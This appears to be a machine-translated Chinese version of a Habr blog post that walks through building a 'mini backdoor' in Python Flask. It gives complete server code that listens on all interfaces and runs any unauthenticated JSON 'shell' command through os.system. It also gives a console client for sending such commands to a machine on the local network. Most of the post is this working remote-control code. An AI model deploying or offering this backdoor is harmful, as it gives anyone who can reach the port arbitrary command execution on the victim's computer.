嘿哈布尔!
我最近观看了编程流的下载版本“如何在 Flask 中创建您自己的 Web 应用程序”。 我决定在一些项目中巩固我的知识。 很长一段时间我不知道该写什么,然后我突然想到:“为什么不在 Flask 中制作一个迷你后门呢?”
后门的第一个实现和功能选项立即出现在我的脑海中。 但我决定立即列出后门功能列表:
- 知道如何打开网站
- 具有命令行访问权限
- 能够打开程序、照片、视频
因此,使用 webbrowser 模块非常容易实现第一点。 我决定使用 os 模块来实现第二点。 第三个也是通过 os 模块,但我将使用“链接”(稍后会详细介绍)。
编写服务器
所以,*鼓乐*所有服务器代码:
from flask import Flask, request
import webbrowser
import os
import re
app = Flask(__name__)
@app.route('/mycomp', methods=['POST'])
def hell():
json_string = request.json
if json_string['command'] == 'test':
return 'The server is running and waiting for commands...'
if json_string['command'] == 'openweb':
webbrowser.open(url='https://www.'+json_string['data'], new=0)
return 'Site opening ' + json_string['data'] + '...'
if json_string['command'] == 'shell':
os.system(json_string['data'])
return 'Command execution ' + json_string['data'] + '...'
if json_string['command'] == 'link':
links = open('links.txt', 'r')
for i in range(int(json_string['data'])):
link = links.readline()
os.system(link.split('>')[0])
return 'Launch ' + link.split('>')[1]
if __name__ == '__main__':
app.run(host='0.0.0.0')
我已经把所有的代码都转储了,是时候解释一下本质了。
所有代码都在本地计算机的端口 5000 上运行。 要与服务器交互,我们必须发送 JSON POST 请求。
JSON请求结构:
{‘command’: ‘comecommand’, ‘data’: ‘somedata’}
嗯,“命令”是我们要执行的命令,这是有道理的。 “数据”是命令参数。
您可以编写并发送 JSON 请求以手动与服务器交互(请求将帮助您)。 或者您可以编写一个控制台客户端。
写一个客户端
代码:
import requests
logo = ['nn',
'****** ********',
'******* *********',
'** ** ** **',
'** ** ** ** Written on Python',
'******* ** **',
'******** ** **',
'** ** ** ** Author: ROBOTD4',
'** ** ** **',
'** ** ** **',
'******** *********',
'******* ********',
'nn']
p = ''
iport = '192.168.1.2:5000'
host = 'http://' + iport + '/mycomp'
def test():
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
def start():
for i in logo:
print(i)
start()
test()
while True:
command = input('>')
if command == '':
continue
a = command.split()
if command == 'test':
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
if a[0] == 'shell':
for i in range(1, len(a)):
p = p + a[i] + ' '
dict = {'command': 'shell', 'data': p}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
p = ''
if a[0] == 'link':
if len(a) > 1:
dict = {'command': 'link', 'data': int(a[1])}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('Комманда не содержит аргументов!')
if a[0] == 'openweb':
if len(a) > 1:
dict = {'command': 'openweb', 'data': a[1]}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('Комманда не содержит аргументов!')
if a[0] == 'set':
if a[1] == 'host':
ip = a[2] + ':5000'
if command == 'quit':
break
说明:
首先,导入 requests 模块(用于与服务器交互)。 下面是启动和测试功能的描述。 然后就是神奇发生的循环。 你读过代码吗? 这样你就明白了循环中发生的魔法的意义。 输入命令 - 它被执行。 Shell – 命令行命令(逻辑超出范围)。
测试 – 检查服务器是否正在运行(后门)
链接——使用“快捷方式”
Openweb – 打开网站
Quit——退出客户端
设置——设置你的电脑在本地网络的IP
现在更多关于链接的信息。
服务器旁边有一个link.txt文件。 它包含文件(视频、照片、程序)的链接(完整路径)。
结构是这样的:
полный_путь>описание
полный_путь>описание
总
我们有一个后门服务器,用于控制本地网络(在 Wi-Fi 网络内)上的计算机。 从技术上讲,我们可以从任何具有 python 解释器的设备运行客户端。
PS我添加了set命令,这样如果本地网络上的计算机分配了不同的IP,可以直接在客户端中更改。
来源: habr.com